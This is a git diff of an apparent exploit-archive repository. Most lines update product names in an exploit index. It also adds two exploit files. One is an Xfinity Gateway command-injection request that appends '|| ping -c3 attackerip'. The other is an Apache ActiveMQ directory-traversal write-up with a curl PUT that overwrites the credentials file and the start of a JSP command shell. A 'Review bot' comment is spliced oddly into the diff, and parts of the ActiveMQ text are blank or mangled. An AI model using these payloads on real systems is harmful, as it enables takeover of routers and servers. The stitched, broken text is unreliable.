diff --git a/files.csv b/files.csv
index 060919483..32e5a040c 100644
--- a/files.csv
+++ b/files.csv
@@ -734,7 +734,7 @@ id,file,description,date,author,platform,type,port
 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
-5709,platforms/windows/dos/5709.pl,"FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
+5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
 5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
@@ -835,9 +835,9 @@ id,file,description,date,author,platform,type,port
 6756,platforms/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0
 6761,platforms/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",windows,dos,0
 6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0
-6800,platforms/windows/dos/6800.pl,"FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
+6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
-6812,platforms/windows/dos/6812.pl,"FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
+6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
 6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
 6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0
@@ -1440,7 +1440,7 @@ id,file,description,date,author,platform,type,port
 11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0
 11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0
 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0
-11842,platforms/windows/dos/11842.py,"FreeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0
+11842,platforms/windows/dos/11842.py,"freeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0
 11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0
 11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos,0
 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69
@@ -2089,7 +2089,7 @@ id,file,description,date,author,platform,type,port
 18257,platforms/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0
 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0
 18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0
-18268,platforms/windows/dos/18268.txt,"FreeSSHd - Denial of Service (PoC)",2011-12-24,Level,windows,dos,0
+18268,platforms/windows/dos/18268.txt,"freeSSHd - Denial of Service (PoC)",2011-12-24,Level,windows,dos,0
 18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
 18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0
 18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
@@ -3519,7 +3519,7 @@ id,file,description,date,author,platform,type,port
 27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0
 27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",windows,dos,0
 27547,platforms/multiple/dos/27547.txt,"Zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0
-27553,platforms/windows/dos/27553.py,"onehttpd 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080
+27553,platforms/windows/dos/27553.py,"OneHTTPD 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080
 27566,platforms/multiple/dos/27566.txt,"Doomsday 1.8/1.9 - Multiple Remote Format String Vulnerabilities",2005-04-03,"Luigi Auriemma",multiple,dos,0
 27581,platforms/linux/dos/27581.txt,"Tony Cook Imager 0.4x - JPEG and TGA Images Denial of Service",2006-04-07,"Kjetil Kjernsmo",linux,dos,0
 27635,platforms/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Null Pointer Dereference Denial of Service",2006-04-13,"Thomas Waldegger",linux,dos,0
@@ -3930,7 +3930,7 @@ id,file,description,date,author,platform,type,port
 31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
-31218,platforms/linux/dos/31218.txt,"FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
+31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
 31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0
 31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos,0
 31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0
@@ -4609,7 +4609,7 @@ id,file,description,date,author,platform,type,port
 37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0
 37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos,0
 37783,platforms/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0
-38001,platforms/windows/dos/38001.py,"FreeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22
+38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22
 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - '.pls' Local Crash (PoC)",2015-08-17,St0rn,windows,dos,0
 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos,0
 37839,platforms/linux/dos/37839.txt,"Flash - PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0
@@ -5264,7 +5264,7 @@ id,file,description,date,author,platform,type,port
 40744,platforms/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos,0
 40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - win32k Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0
 40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0
-40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9 < 11 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
+40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9/10/11 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
 40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
 40762,platforms/linux/dos/40762.c,"Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
 40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
@@ -5286,7 +5286,7 @@ id,file,description,date,author,platform,type,port
 40841,platforms/windows/dos/40841.html,"Microsoft Internet Explorer 8 - MSHTML 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,windows,dos,0
 40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 - MSHTML 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0
 40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0
-40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8 / 9 / 10 / 11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
+40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8337,7 +8337,7 @@ id,file,description,date,author,platform,type,port
 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0
 37052,platforms/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0
 37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0
-37064,platforms/win_x86-64/local/37064.py,"Microsoft Windows 8.0 < 8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0
+37064,platforms/win_x86-64/local/37064.py,"Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0
 37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation",2015-05-23,rebel,linux,local,0
 37089,platforms/linux/local/37089.txt,"Fuse 2.9.3-15 - Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0
 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0
@@ -9129,7 +9129,7 @@ id,file,description,date,author,platform,type,port
 1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0
 1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0
 1776,platforms/windows/remote/1776.c,"Medal of Honor - (getinfo) Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203
-1787,platforms/windows/remote/1787.py,"FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
+1787,platforms/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
 1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (Validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0
 1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900
 1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900
@@ -9637,7 +9637,7 @@ id,file,description,date,author,platform,type,port
 5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (1)",2008-06-05,shinnai,windows,remote,0
 5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (2)",2008-06-05,shinnai,windows,remote,0
 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0
-5751,platforms/windows/remote/5751.pl,"FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
+5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
 5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0
 5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0
 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161
@@ -9835,7 +9835,7 @@ id,file,description,date,author,platform,type,port
 8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
 8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
-8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
+8295,platforms/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0
 8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0
 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0
@@ -10559,7 +10559,7 @@ id,file,description,date,author,platform,type,port
 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
 16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16460,platforms/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
+16461,platforms/windows/remote/16461.rb,"freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16462,platforms/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
@@ -12605,7 +12605,7 @@ id,file,description,date,author,platform,type,port
 23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit",2012-12-02,kingcope,windows,remote,0
 23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0
 23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
-23080,platforms/windows/remote/23080.txt,"FreeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
+23080,platforms/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
 23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0
 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0
 23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0
@@ -12901,7 +12901,7 @@ id,file,description,date,author,platform,type,port
 24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0
 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0
 24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0
-24133,platforms/windows/remote/24133.rb,"FreeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
+24133,platforms/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0
 24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0
 24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0
@@ -15096,7 +15096,7 @@ id,file,description,date,author,platform,type,port
 40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
 40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
 40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
-40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
+40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8/9/10/11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
 40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
 40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
@@ -15116,6 +15116,7 @@ id,file,description,date,author,platform,type,port
 40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 40854,platforms/windows/remote/40854.py,"Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow",2016-12-01,vportal,windows,remote,0
+40857,platforms/windows/remote/40857.txt,"Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution",2015-08-17,"David Jorm",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -18802,7 +18803,7 @@ id,file,description,date,author,platform,type,port
 5710,platforms/php/webapps/5710.pl,"Joomla! Component Bible Study 1.5.0 - 'id' Parameter SQL Injection",2008-05-31,Stack,php,webapps,0
 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
 5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0
-5714,platforms/php/webapps/5714.pl,"Joomla! Component com_mycontent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
+5714,platforms/php/webapps/5714.pl,"Joomla! Component MyContent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
 5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0
 5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0
 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0
@@ -36837,3 +36838,4 @@ id,file,description,date,author,platform,type,port
 40851,platforms/php/webapps/40851.txt,"Joomla! Component Catalog 1.0.7 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
 40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
 40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0
+40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0
diff --git a/platforms/hardware/webapps/40856.txt b/platforms/hardware/webapps/40856.txt
new file mode 100755
index 000000000..e48fc33db
--- /dev/null
+++ b/platforms/hardware/webapps/40856.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Xfinity Gateway: Remote Code Execution
+# Date: 12/2/2016
+# Exploit Author: Gregory Smiley
+# Contact: gsx0r.sec@gmail.com
+# Vendor Homepage: http://xfinity.com
+# Platform: php
+
+The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.
+
+PoC:
+
+POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
+Host: 10.0.0.1
+User-Agent:
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://10.0.0.1/network_diagnostic_tools.php
+Content-Length: 91
+Cookie: PHPSESSID=; auth=
+DNT: 1
+X-Forwarded-For: 8.8.8.8
+Connection: keep-alive
+
+test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
+
+
+If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection. This can be leveraged to completely compromise the device.
+
+This vulnerability is also particularly dangerous because there is no CSRF protections in this application as demonstrated here https://www.exploit-db.com/exploits/40853/
+
diff --git a/platforms/windows/remote/40857.txt b/platforms/windows/remote/40857.txt
new file mode 100755
index 000000000..e3e7b0918
--- /dev/null
+++ b/platforms/windows/remote/40857.txt
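Review bot: The header line `# Platform: php` disagrees with the files.csv entry this commit adds for the same file, which places it under platforms/hardware/webapps with platform `hardware`; one of the two should change so the index and the advisory agree, and the path suggests `# Platform: hardware`. The header also gives no affected gateway model or firmware version and no tested-on line, so a reader cannot tell which devices are affected or whether a later firmware addresses the issue; add `# Version: <affected firmware - to be confirmed>` and `# Tested on: <model/firmware>` under the vendor line. Nothing in the writeup records whether the vendor was notified or has shipped a fix; a `# CVE:` or vendor-fix line, even one that only says the issue was unpatched at publication, would let readers triage.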
@@ -0,0 +1,71 @@ +I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. +I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter. +An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution. + +Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes: + + + + + +Effectively blocking the upload of JSP files into contexts that will allow them to execute. + +I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials: + +$ cat jetty-realm.properties hacker: hacker, admin +$ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties + +This seems to have the disadvantage of requiring a reboot of the server to take effect. +I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot. +The attacker can then take a standard JSP shell: + +$ cat cmd.jsp + <%@ page import="java.util.*,java.io.*"%> + <% + %> + + Commands with JSP +
+ + +
+
  
+ <%  
+ if (request.getParameter("cmd") != null) {  
+ out.println("Command: " + request.getParameter("cmd") + "
